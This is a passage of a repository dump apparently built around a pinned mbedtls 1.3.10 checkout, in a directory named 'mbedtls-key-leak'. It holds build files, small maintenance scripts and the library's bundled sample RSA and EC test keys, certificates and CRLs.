FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF 2 | G = 02 3 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/programs/pkey/rsa_priv.txt: -------------------------------------------------------------------------------- 1 | N = A72AC5546F019F54AEABD2CAD2030E7340C92D60F059C9B6C54AF14F79AB09DEE3CB2506051113234A06E9BE28215DEFD6E0FC36FC54A022481A5512063CD7BE74A10162FA706516FCE754DEBE42321ADF2F470E098A7CC969D43928CDBC578B1F8E3FC0D5B29E1940D44FC7E0D6D8270CED676A35C1EC41980D57F75BC479C5 2 | E = 010001 3 | D = 29F4F93C3CF45A4A45E10872318DE4D596A027CC99E6DF530967CAF358A54E3FEC4AB38B344059DE54993197B1B8D63BF961D4CBF43F4545F574EE7F2CA39EBE5CE15BC4E34EC05ED5B5967671F2003F43D8A9EBA88D2BB22B9197A0A68FAEBCED5B36E631B5ADD5A10255D4CFD3A748C07DD2921CF085A3CADD7307BD1D172D 4 | P = EE64DB284B212A1D12C3EB738E1E72E20D2A7C4C5A4D4C6517CA7C1BD6DFDB22BFAB5D6866E101700BAF4120DEF472731E3274871CD1FDB86E82935E19014B43 5 | Q = B383476405059F05F59618417CDC0B4683BC9506F6FD009780FEFF2CD5BCCB65B636A441DB4FEE312BAECF62ACA7197BB8B78221DF24173E8F4A765400872257 6 | DP = 438529557642046D8B9D1618FA8DC138294679421EE979D3C0334787930A80448D48FA01D1F1B4B88976AFD9A18C56C6282D5E37CE7FE37ED33E0483484DC785 7 | DQ = 914DDA23A3CD010399DE7C93C5B5778B04674959F1E2A8EFF9826E9AA407C5BBF6DA13EB1AD280435CD08B1D9C1346155757730667D096E014AC794B55820CD1 8 | QP = 16E464DA873A746E819B5DC1A6598AFEBC0C7149A6A1BDD4AEAA772BFE7ECE793F834971A1EE8AF0A31C1390D0BB8D7B7398065B9940AC00FB93FB4B18AE93FC 9 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/programs/pkey/rsa_pub.txt: -------------------------------------------------------------------------------- 1 | N = A72AC5546F019F54AEABD2CAD2030E7340C92D60F059C9B6C54AF14F79AB09DEE3CB2506051113234A06E9BE28215DEFD6E0FC36FC54A022481A5512063CD7BE74A10162FA706516FCE754DEBE42321ADF2F470E098A7CC969D43928CDBC578B1F8E3FC0D5B29E1940D44FC7E0D6D8270CED676A35C1EC41980D57F75BC479C5 2 | E = 010001 3 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/programs/random/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | add_executable(gen_random_havege gen_random_havege.c) 2 | target_link_libraries(gen_random_havege mbedtls) 3 | 4 | add_executable(gen_random_ctr_drbg gen_random_ctr_drbg.c) 5 | target_link_libraries(gen_random_ctr_drbg mbedtls) 6 | 7 | add_executable(gen_entropy gen_entropy.c) 8 | target_link_libraries(gen_entropy mbedtls) 9 | 10 | install(TARGETS gen_random_havege gen_random_ctr_drbg gen_entropy 11 | DESTINATION "bin" 12 | PERMISSIONS OWNER_READ OWNER_WRITE OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE) 13 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/programs/ssl/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | set(THREADS_USE_PTHREADS_WIN32 true) 2 | find_package(Threads) 3 | 4 | set(libs 5 | mbedtls 6 | ) 7 | 8 | set(targets 9 | ssl_client1 10 | ssl_client2 11 | ssl_server 12 | ssl_fork_server 13 | ssl_mail_client 14 | ) 15 | 16 | if(USE_PKCS11_HELPER_LIBRARY) 17 | set(libs ${libs} pkcs11-helper) 18 | endif(USE_PKCS11_HELPER_LIBRARY) 19 | 20 | if(ENABLE_ZLIB_SUPPORT) 21 | set(libs ${libs} ${ZLIB_LIBRARIES}) 22 | endif(ENABLE_ZLIB_SUPPORT) 23 | 24 | add_executable(ssl_client1 ssl_client1.c) 25 | target_link_libraries(ssl_client1 ${libs}) 26 | 27 | add_executable(ssl_client2 ssl_client2.c) 28 | target_link_libraries(ssl_client2 ${libs}) 29 | 30 | add_executable(ssl_server ssl_server.c) 31 | target_link_libraries(ssl_server ${libs}) 32 | 33 | add_executable(ssl_server2 ssl_server2.c) 34 | target_link_libraries(ssl_server2 ${libs}) 35 | 36 | add_executable(ssl_fork_server ssl_fork_server.c) 37 | target_link_libraries(ssl_fork_server ${libs}) 38 | 39 | add_executable(ssl_mail_client ssl_mail_client.c) 40 | target_link_libraries(ssl_mail_client ${libs}) 41 | 42 | if(THREADS_FOUND) 43 | add_executable(ssl_pthread_server ssl_pthread_server.c) 44 | target_link_libraries(ssl_pthread_server ${libs} ${CMAKE_THREAD_LIBS_INIT}) 45 | set(targets ${targets} ssl_pthread_server) 46 | endif(THREADS_FOUND) 47 | 48 | install(TARGETS ${targets} 49 | DESTINATION "bin" 50 | PERMISSIONS OWNER_READ OWNER_WRITE OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE) 51 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/programs/test/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | FIND_PACKAGE(OpenSSL) 2 | 3 | set(libs 4 | mbedtls 5 | ) 6 | 7 | if(USE_PKCS11_HELPER_LIBRARY) 8 | set(libs ${libs} pkcs11-helper) 9 | endif(USE_PKCS11_HELPER_LIBRARY) 10 | 11 | if(ENABLE_ZLIB_SUPPORT) 12 | set(libs ${libs} ${ZLIB_LIBRARIES}) 13 | endif(ENABLE_ZLIB_SUPPORT) 14 | 15 | add_executable(selftest selftest.c) 16 | target_link_libraries(selftest ${libs}) 17 | 18 | add_executable(benchmark benchmark.c) 19 | target_link_libraries(benchmark ${libs}) 20 | 21 | add_executable(ssl_test ssl_test.c) 22 | target_link_libraries(ssl_test ${libs}) 23 | 24 | add_executable(ssl_cert_test ssl_cert_test.c) 25 | target_link_libraries(ssl_cert_test ${libs}) 26 | 27 | install(TARGETS selftest benchmark ssl_test ssl_cert_test 28 | DESTINATION "bin" 29 | PERMISSIONS OWNER_READ OWNER_WRITE OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE) 30 | 31 | if(OPENSSL_FOUND) 32 | add_executable(o_p_test o_p_test.c) 33 | include_directories(${OPENSSL_INCLUDE_DIR}) 34 | target_link_libraries(o_p_test ${libs} ${OPENSSL_LIBRARIES}) 35 | 36 | install(TARGETS o_p_test 37 | DESTINATION "bin" 38 | PERMISSIONS OWNER_READ OWNER_WRITE OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE) 39 | endif(OPENSSL_FOUND) 40 | 41 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/programs/util/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | set(libs 2 | mbedtls 3 | ) 4 | 5 | add_executable(strerror strerror.c) 6 | target_link_libraries(strerror ${libs}) 7 | 8 | add_executable(pem2der pem2der.c) 9 | target_link_libraries(pem2der ${libs}) 10 | 11 | install(TARGETS strerror pem2der 12 | DESTINATION "bin" 13 | PERMISSIONS OWNER_READ OWNER_WRITE OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE) 14 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/programs/x509/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | set(libs 2 | mbedtls 3 | ) 4 | 5 | if(USE_PKCS11_HELPER_LIBRARY) 6 | set(libs ${libs} pkcs11-helper) 7 | endif(USE_PKCS11_HELPER_LIBRARY) 8 | 9 | if(ENABLE_ZLIB_SUPPORT) 10 | set(libs ${libs} ${ZLIB_LIBRARIES}) 11 | endif(ENABLE_ZLIB_SUPPORT) 12 | 13 | add_executable(cert_app cert_app.c) 14 | target_link_libraries(cert_app ${libs}) 15 | 16 | add_executable(crl_app crl_app.c) 17 | target_link_libraries(crl_app ${libs}) 18 | 19 | add_executable(req_app req_app.c) 20 | target_link_libraries(req_app ${libs}) 21 | 22 | add_executable(cert_req cert_req.c) 23 | target_link_libraries(cert_req ${libs}) 24 | 25 | add_executable(cert_write cert_write.c) 26 | target_link_libraries(cert_write ${libs}) 27 | 28 | install(TARGETS cert_app crl_app req_app cert_req cert_write 29 | DESTINATION "bin" 30 | PERMISSIONS OWNER_READ OWNER_WRITE OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE) 31 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/readme.md: -------------------------------------------------------------------------------- 1 | In this path we have to clone the correct mbedtls version [1]. 2 | TODO: build this as a submodule 3 | 4 | 5 | 6 | [1]: 7 | ``` 8 | commit 015e48df6e2f15275161012fbb2544ce0a84c752 (HEAD, tag: mbedtls-1.3.10) 9 | Author: Manuel Pégourié-Gonnard 10 | Date: Tue Feb 10 17:00:42 2015 +0100 11 | 12 | Fix soname mistake 13 | ``` 14 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/scripts/activate-config.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | # DEPRECATED! 4 | # 5 | # activate a pre-defined configuration 6 | 7 | print "This script is deprecated!\n"; 8 | print "See configs/README.txt regarding alternative config.h usage\n"; 9 | exit 1; 10 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/scripts/data_files/vs2010-sln-template.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual C++ Express 2010 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mbedTLS", "mbedTLS.vcxproj", "{46CF2D25-6A36-4189-B59C-E4815388E554}" 5 | EndProject 6 | APP_ENTRIES 7 | Global 8 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 9 | Debug|Win32 = Debug|Win32 10 | Debug|x64 = Debug|x64 11 | Release|Win32 = Release|Win32 12 | Release|x64 = Release|x64 13 | EndGlobalSection 14 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 15 | {46CF2D25-6A36-4189-B59C-E4815388E554}.Debug|Win32.ActiveCfg = Debug|Win32 16 | {46CF2D25-6A36-4189-B59C-E4815388E554}.Debug|Win32.Build.0 = Debug|Win32 17 | {46CF2D25-6A36-4189-B59C-E4815388E554}.Debug|x64.ActiveCfg = Debug|x64 18 | {46CF2D25-6A36-4189-B59C-E4815388E554}.Debug|x64.Build.0 = Debug|x64 19 | {46CF2D25-6A36-4189-B59C-E4815388E554}.Release|Win32.ActiveCfg = Release|Win32 20 | {46CF2D25-6A36-4189-B59C-E4815388E554}.Release|Win32.Build.0 = Release|Win32 21 | {46CF2D25-6A36-4189-B59C-E4815388E554}.Release|x64.ActiveCfg = Release|x64 22 | {46CF2D25-6A36-4189-B59C-E4815388E554}.Release|x64.Build.0 = Release|x64 23 | CONF_ENTRIES 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/scripts/data_files/vs6-workspace-template.dsw: -------------------------------------------------------------------------------- 1 | Microsoft Developer Studio Workspace File, Format Version 6.00 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE! 3 | 4 | APP_ENTRIES 5 | ############################################################################### 6 | 7 | Global: 8 | 9 | Package=<5> 10 | {{{ 11 | }}} 12 | 13 | Package=<3> 14 | {{{ 15 | }}} 16 | 17 | ############################################################################### 18 | 19 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/scripts/polarssl_symlinks.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Create libpolarssl.* symlinks in the given directory 4 | 5 | if [ $# -ne 1 ]; then 6 | echo "Usage: $0 " >&2 7 | exit 1 8 | fi 9 | 10 | if [ -d "$1" ]; then :; else 11 | echo "$0: target directory must exist" >&2 12 | exit 1 13 | fi 14 | 15 | if cd "$1"; then :; else 16 | echo "$0: cd '$1' failed" >&2 17 | exit 1 18 | fi 19 | 20 | if ls | grep 'libmbedtls\.' >/dev/null; then :; else 21 | echo "$0: libmbedtls not found in target directory" >&2 22 | exit 1 23 | fi 24 | 25 | for f in libmbedtls.*; do 26 | ln -sf $f libpolarssl${f#libmbedtls} 27 | done 28 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/scripts/recursion.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | # Find functions making recursive calls to themselves. 4 | # (Multiple recursion where a() calls b() which calls a() not covered.) 5 | # 6 | # When the recursion depth might depend on data controlled by the attacker in 7 | # an unbounded way, those functions should use interation instead. 8 | # 9 | # Typical usage: scripts/recursion.pl library/*.c 10 | 11 | use warnings; 12 | use strict; 13 | 14 | use utf8; 15 | use open qw(:std utf8); 16 | 17 | # exclude functions that are ok: 18 | # - mpi_write_hlp: bounded by size of mpi, a compile-time constant 19 | # - x509_crt_verify_child: bounded by POLARSSL_X509_MAX_INTERMEDIATE_CA 20 | my $known_ok = qr/mpi_write_hlp|x509_crt_verify_child/; 21 | 22 | my $cur_name; 23 | my $inside; 24 | my @funcs; 25 | 26 | die "Usage: $0 file.c [...]\n" unless @ARGV; 27 | 28 | while (<>) 29 | { 30 | if( /^[^\/#{}\s]/ && ! /\[.*]/ ) { 31 | chomp( $cur_name = $_ ) unless $inside; 32 | } elsif( /^{/ && $cur_name ) { 33 | $inside = 1; 34 | $cur_name =~ s/.* ([^ ]*)\(.*/$1/; 35 | } elsif( /^}/ && $inside ) { 36 | undef $inside; 37 | undef $cur_name; 38 | } elsif( $inside && /\b\Q$cur_name\E\([^)]/ ) { 39 | push @funcs, $cur_name unless /$known_ok/; 40 | } 41 | } 42 | 43 | print "$_\n" for @funcs; 44 | exit @funcs; 45 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/scripts/tmp_ignore_makefiles.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Temporarily (de)ignore Makefiles generated by CMake to allow easier 4 | # git development 5 | 6 | IGNORE="" 7 | 8 | # Parse arguments 9 | # 10 | until [ -z "$1" ] 11 | do 12 | case "$1" in 13 | -u|--undo) 14 | IGNORE="0" 15 | ;; 16 | -v|--verbose) 17 | # Be verbose 18 | VERBOSE="1" 19 | ;; 20 | -h|--help) 21 | # print help 22 | echo "Usage: $0" 23 | echo -e " -h|--help\t\tPrint this help." 24 | echo -e " -u|--undo\t\tRemove ignores and continue tracking." 25 | echo -e " -v|--verbose\t\tVerbose." 26 | exit 1 27 | ;; 28 | *) 29 | # print error 30 | echo "Unknown argument: '$1'" 31 | exit 1 32 | ;; 33 | esac 34 | shift 35 | done 36 | 37 | if [ "X" = "X$IGNORE" ]; 38 | then 39 | [ $VERBOSE ] && echo "Ignoring Makefiles" 40 | git update-index --assume-unchanged Makefile library/Makefile programs/Makefile tests/Makefile 41 | else 42 | [ $VERBOSE ] && echo "Tracking Makefiles" 43 | git update-index --no-assume-unchanged Makefile library/Makefile programs/Makefile tests/Makefile 44 | fi 45 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/.gitignore: -------------------------------------------------------------------------------- 1 | *.sln 2 | *.vcxproj 3 | 4 | *.log 5 | /test_suite* 6 | data_files/mpi_write 7 | data_files/hmac_drbg_seed 8 | data_files/ctr_drbg_seed 9 | data_files/entropy_seed 10 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/Descriptions.txt: -------------------------------------------------------------------------------- 1 | test_suites 2 | The various 'test_suite_XXX' programs from the 'tests' directory, executed 3 | using 'make check' (Unix make) or 'make test' (Cmake), include test cases 4 | (reference test vectors, sanity checks, malformed input for parsing 5 | functions, etc.) for all modules except the SSL modules. 6 | 7 | selftests 8 | The 'programs/test/selftest' program runs the 'XXX_self_test()' functions 9 | of each individual module. Most of them are included in the respective 10 | test suite, but some slower ones are only included here. 11 | 12 | compat 13 | The 'tests/compat.sh' script checks interoperability with OpenSSL and 14 | GnuTLS (and ourselves!) for every common ciphersuite, in every TLS 15 | version, both ways (client/server), using client authentication or not. 16 | For each ciphersuite/version/side/authmode it performs a full handshake 17 | and a small data exchange. 18 | 19 | ssl_opt 20 | The 'tests/ssl-opt.sh' script checks various options and/or operations not 21 | covered by compat.sh: session resumption (using session cache or tickets), 22 | renegotiation, SNI, other extensions, etc. 23 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/cert_example_multi_nocn.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIB/TCCAWagAwIBAgIJAPfGf/jpqWP5MA0GCSqGSIb3DQEBBQUAMA0xCzAJBgNV 3 | BAYTAk5MMB4XDTE0MDEyMjEwMDQzM1oXDTI0MDEyMjEwMDQzM1owDTELMAkGA1UE 4 | BhMCTkwwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAN0Rip+ZurBoyirqO2pt 5 | WZftTslU5A3uzqB9oB6q6A7CuxNA24oSjokTJKXF9frY9ZDXyMrLxf6THa/aEiNz 6 | UnlGGrqgVyt2FjGzqK/nOJsIi2OZOgol7kXSGFi6uZMa7dRYmmMbN/z3FAifhWVJ 7 | 81kybdHg6G3eUu1mtKkL2kCVAgMBAAGjZTBjMAkGA1UdEwQCMAAwCwYDVR0PBAQD 8 | AgXgMEkGA1UdEQRCMECCHHd3dy5zaG90b2thbi1icmF1bnNjaHdlaWcuZGWCFHd3 9 | dy5tYXNzaW1vLWFiYXRlLmV1hwTAqAEBhwTAqEWQMA0GCSqGSIb3DQEBBQUAA4GB 10 | ABjx1ytrqCyFC5/0cjWnbLK9vsvLny2ZikDewfRxqJ5zAxGWLqHOr1SmUmu2DrvB 11 | bkT9g5z19+iMhPnzJz1x7Q2m7WTIJTuUPK+hKZJATDLNhZ86h5Nkw8k9YzKcOrPm 12 | EIqsy55CSgLU0ntljqSBvSb4ifrF1NnIWej2lSfN6r+3 13 | -----END CERTIFICATE----- 14 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/cert_v1_with_ext.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDzTCCArUCCQC97UTH0j7CpDANBgkqhkiG9w0BAQUFADCBhzELMAkGA1UEBhMC 3 | WFgxCzAJBgNVBAgTAlhYMQswCQYDVQQHEwJYWDELMAkGA1UEChMCWFgxCzAJBgNV 4 | BAsTAlhYMScwJQYJKoZIhvcNAQkBFhhhZG1pbkBpZGVudGl0eS1jaGVjay5vcmcx 5 | GzAZBgNVBAMTEmlkZW50aXR5LWNoZWNrLm9yZzAeFw0xMzA3MDQxNjE3MDJaFw0x 6 | NDA3MDQxNjE3MDJaMIGHMQswCQYDVQQGEwJYWDELMAkGA1UECBMCWFgxCzAJBgNV 7 | BAcTAlhYMQswCQYDVQQKEwJYWDELMAkGA1UECxMCWFgxJzAlBgkqhkiG9w0BCQEW 8 | GGFkbWluQGlkZW50aXR5LWNoZWNrLm9yZzEbMBkGA1UEAxMSaWRlbnRpdHktY2hl 9 | Y2sub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1v8FswMughO8 10 | mwkHWAf+XRpK33kYR0ifBnObvk2R9ZTEUk/TfFEEFVlen5xhiE0g8lbCj8Y5Mzsg 11 | wZsJv5in/KnraYb7VC0ah0jx4sMkhKRcyUWfjyH8r7FNH1j1jd08ZpWJGotYxxaL 12 | evqom1rzLN99JPObwyCCgGcQjlRV7cMfIgwlwHb/JPXOy/hYAgjrCjqvBu3nL5/b 13 | HF0PyVGiKCEQiHhMBKNjAxzQrCUGy7Vp+3QlIYrs6/m5A96vohX/j+wzwIp3QgiK 14 | Yhj5E4Zo/iQLf6Rwl7pL4RTdT+crcy143mYiShNY+ayl9snfVJNnuHaMe15fVEsP 15 | X9lDvdBvXwIDAQABoz8wPTA7BgNVHREENDAyghJpZGVudGl0eS1jaGVjay5vcmeC 16 | Fnd3dy5pZGVudGl0eS1jaGVjay5vcmeHBCU7/jAwDQYJKoZIhvcNAQEFBQADggEB 17 | AAXUXoWlQxKvSCVWhes8x03MCude0nDqDFH1DPGIKeVeWOw87nVni+hIvy8II6hj 18 | 5ZfGSHuZci2AgElA3tXk2qDcZ/uBXe2VV4IwsgXKUYSlpz1xoU55InT4e7KdssEP 19 | HOyrU03Dzm8Jk0PhgEJpV48tkWYoJvZvOiwG0e43UPDv9xp8C8EbvJmmuWkUWnNW 20 | o0yDnoAOxGfUGSUQ1guTpWCoQEKj3DS4v4lI0kNmJm+oRE2vv1XealWEHSuMpRZO 21 | Qhy8WImX3muw99MP579tY44D5Z7p3kpiC1bwV3tzkHdf5mkrAbFJIfliPvjMrPMw 22 | 2eyXXijDsebpT0w3ruMxjHg= 23 | -----END CERTIFICATE----- 24 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/cli2.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICLDCCAbKgAwIBAgIBDTAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTMwOTI0MTU1MjA0WhcNMjMwOTIyMTU1MjA0WjBBMQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxHzAdBgNVBAMTFlBvbGFyU1NMIFRlc3QgQ2xpZW50IDIw 6 | WTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAARX5a6xc9/TrLuTuIH/Eq7u5lOszlVT 7 | 9jQOzC7jYyUL35ji81xgNpbA1RgUcOV/n9VLRRjlsGzVXPiWj4dwo+THo4GdMIGa 8 | MAkGA1UdEwQCMAAwHQYDVR0OBBYEFHoAX4Zk/OBd5REQO7LmO8QmP8/iMG4GA1Ud 9 | IwRnMGWAFJ1tICRJAT8ry3i1Gbx+JMnb+zZ8oUKkQDA+MQswCQYDVQQGEwJOTDER 10 | MA8GA1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0GC 11 | CQDBQ+J+YkPM6DAKBggqhkjOPQQDAgNoADBlAjBKZQ17IIOimbmoD/yN7o89u3BM 12 | lgOsjnhw3fIOoLIWy2WOGsk/LGF++DzvrRzuNiACMQCd8iem1XS4JK7haj8xocpU 13 | LwjQje5PDGHfd3h9tP38Qknu5bJqws0md2KOKHyeV0U= 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/cli2.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MHcCAQEEIPb3hmTxZ3/mZI3vyk7p3U3wBf+WIop6hDhkFzJhmLcqoAoGCCqGSM49 3 | AwEHoUQDQgAEV+WusXPf06y7k7iB/xKu7uZTrM5VU/Y0Dswu42MlC9+Y4vNcYDaW 4 | wNUYFHDlf5/VS0UY5bBs1Vz4lo+HcKPkxw== 5 | -----END EC PRIVATE KEY----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl-ec-sha1.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBbzCB9gIBATAJBgcqhkjOPQQBMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQ 3 | b2xhclNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQRcNMTMwOTI0MTYz 4 | MTA4WhcNMjMwOTIyMTYzMTA4WjAUMBICAQoXDTEzMDkyNDE2MjgzOFqgcjBwMG4G 5 | A1UdIwRnMGWAFJ1tICRJAT8ry3i1Gbx+JMnb+zZ8oUKkQDA+MQswCQYDVQQGEwJO 6 | TDERMA8GA1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMg 7 | Q0GCCQDBQ+J+YkPM6DAJBgcqhkjOPQQBA2kAMGYCMQDVG95rrSSl4dJgbJ5vR1GW 8 | svEuEsAh35EhF1WrcadMuCeMQVX9cUPupFfQUpHyMfoCMQCKf0yv8pN9BAoi3FVm 9 | 56meWPhUekgLKKMAobt2oJJY6feuiFU2YFGs1aF0rV6Bj+U= 10 | -----END X509 CRL----- 11 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl-ec-sha224.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBcDCB9wIBATAKBggqhkjOPQQDATA+MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EXDTEzMDkyNDE2 4 | MzEwOFoXDTIzMDkyMjE2MzEwOFowFDASAgEKFw0xMzA5MjQxNjI4MzhaoHIwcDBu 5 | BgNVHSMEZzBlgBSdbSAkSQE/K8t4tRm8fiTJ2/s2fKFCpEAwPjELMAkGA1UEBhMC 6 | TkwxETAPBgNVBAoTCFBvbGFyU1NMMRwwGgYDVQQDExNQb2xhcnNzbCBUZXN0IEVD 7 | IENBggkAwUPifmJDzOgwCgYIKoZIzj0EAwEDaAAwZQIwbn+i0dOest0IJGzuqBLA 8 | V5nscZPvHjDV6lWsSwurS4LC/Uv/qWteuMCp3OqQRJHcAjEA6KA0dibovfL1WKFo 9 | C8jUGxlMfHeWDRkqMfcjjgIpky7v50sKtDOfmFJn3HFUbiKp 10 | -----END X509 CRL----- 11 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl-ec-sha256.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBcTCB9wIBATAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EXDTEzMDkyNDE2 4 | MzEwOFoXDTIzMDkyMjE2MzEwOFowFDASAgEKFw0xMzA5MjQxNjI4MzhaoHIwcDBu 5 | BgNVHSMEZzBlgBSdbSAkSQE/K8t4tRm8fiTJ2/s2fKFCpEAwPjELMAkGA1UEBhMC 6 | TkwxETAPBgNVBAoTCFBvbGFyU1NMMRwwGgYDVQQDExNQb2xhcnNzbCBUZXN0IEVD 7 | IENBggkAwUPifmJDzOgwCgYIKoZIzj0EAwIDaQAwZgIxAKuQ684s7gyhtxKJr6Ln 8 | S2BQ02f1jjPHrZVdXaZvm3C5tGi2cKkoK1aMiyC3LsRCuAIxAIMhj0TmcuIZr5fX 9 | g5RByD7zUnZBpoEAdgxFy4JPJ2IViWOPekSGh8b/JY1VNS6Zbw== 10 | -----END X509 CRL----- 11 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl-ec-sha384.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBcDCB9wIBATAKBggqhkjOPQQDAzA+MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EXDTEzMDkyNDE2 4 | MzEwOFoXDTIzMDkyMjE2MzEwOFowFDASAgEKFw0xMzA5MjQxNjI4MzhaoHIwcDBu 5 | BgNVHSMEZzBlgBSdbSAkSQE/K8t4tRm8fiTJ2/s2fKFCpEAwPjELMAkGA1UEBhMC 6 | TkwxETAPBgNVBAoTCFBvbGFyU1NMMRwwGgYDVQQDExNQb2xhcnNzbCBUZXN0IEVD 7 | IENBggkAwUPifmJDzOgwCgYIKoZIzj0EAwMDaAAwZQIwateJaD13+Yi4HWBIlOov 8 | 8ZDsvnfQfW/R0A1s2ZccAi+byurShuNGiSvsFSh5d/6QAjEA427F8bNk/fdj5YXu 9 | Oo1qEd7WpD2dNUb0draGSIcJGBRGzi5it14UXr9cR4S5eJ6Q 10 | -----END X509 CRL----- 11 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl-ec-sha512.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBcTCB9wIBATAKBggqhkjOPQQDBDA+MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EXDTEzMDkyNDE2 4 | MzEwOFoXDTIzMDkyMjE2MzEwOFowFDASAgEKFw0xMzA5MjQxNjI4MzhaoHIwcDBu 5 | BgNVHSMEZzBlgBSdbSAkSQE/K8t4tRm8fiTJ2/s2fKFCpEAwPjELMAkGA1UEBhMC 6 | TkwxETAPBgNVBAoTCFBvbGFyU1NMMRwwGgYDVQQDExNQb2xhcnNzbCBUZXN0IEVD 7 | 